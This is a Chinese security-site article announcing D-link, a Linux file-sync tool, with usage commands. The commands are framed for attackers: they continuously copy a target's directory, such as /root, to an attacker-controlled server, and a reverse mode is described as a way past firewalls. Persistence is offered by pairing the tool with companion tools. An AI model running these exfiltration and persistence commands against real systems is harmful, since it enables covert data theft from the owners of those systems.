freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux
maptnh 2025-03-22 02:20:43 18131
所属地 海外

D-link

地址:https://github.com/MartinxMax/dlink

D-link 是一个轻量级的 Linux 文件同步工具,使用 C++ 编写。

  1. 目录监控与实时同步更新。

  2. 访问控制:客户端仅允许自动上传和删除文件,不能下载服务器上的敏感文件。即使同步文件从服务器删除,客户端也会帮助恢复到服务器。

  3. 持久性:可以与 Tyrant 或 S-Clustr 一起使用,形成一个强大的自愈网络集群。

  4. Tyrant: [https://github.com/MartinxMax/Tyrant]

  5. S-Clustr:[https://github.com/MartinxMax/S-Clustr]

  6. 通信使用 AES 加密,确保文件同步过程加密,防止中间人攻击。

  7. 在文件同步过程中,实时显示上传和下载的数据。

  8. 使用密钥进行身份验证,防止未经授权的同步操作。

  9. 回环地址同步速度可达 200MB/s,而 LAN 同步速度大约为 20MB/s。

使用方法

$ ./dlink -h

image.png

D-link 转发隧道(客户端到服务器文件同步)

示例:(将目标目录实时同步到攻击者的目录)

服务器:

image-1.png

$ ./dlink server --port <LOCAL-PORT> --path <PATH>

image-2.png

客户端:

创建一个 200MB 的测试文件用于传输

$ dd if=/dev/urandom of=rand_file bs=1M count=200

image-3.png

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY>

image-5.png

服务器:

image-4.png

Wireshark:

image-6.png

D-link 反向隧道(服务器到客户端文件同步)

PS:通常用于绕过防火墙并防止数据拦截。

示例:(将攻击者的目录实时同步到目标目录)

服务器:

image-7.png

$ ./dlink server --port <LOCAL-PORT> --path <PATH> --reverse

image-8.png

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY> --reverse

image-9.png

image-10.png

双向同步

服务器:

$ ./dlink server --port 10098 --path /tmp/root --key abcdefgh&
$ ./dlink server --port 10099 --path /tmp/root --key abcdefgh --reverse

客户端:

$ ./dlink client --endpoint "<SERVER>:10098" --path /root --key abcdefgh &
$ ./dlink client --endpoint "<SERVER>:10099" --path /root --key abcdefgh --reverse
# 黑客 # 数据泄露 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 334 文章数
  • 62 关注者
[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升
2025-03-27
[Meachines] [Medium] Lazy Padding-Oracle+AES_CBC+路径劫持权限提升
2025-03-26
[Meachines] [Medium] DevOops XXE-XML-RSS+cPickle反序列化+git-leak权限提升
2025-03-25
文章目录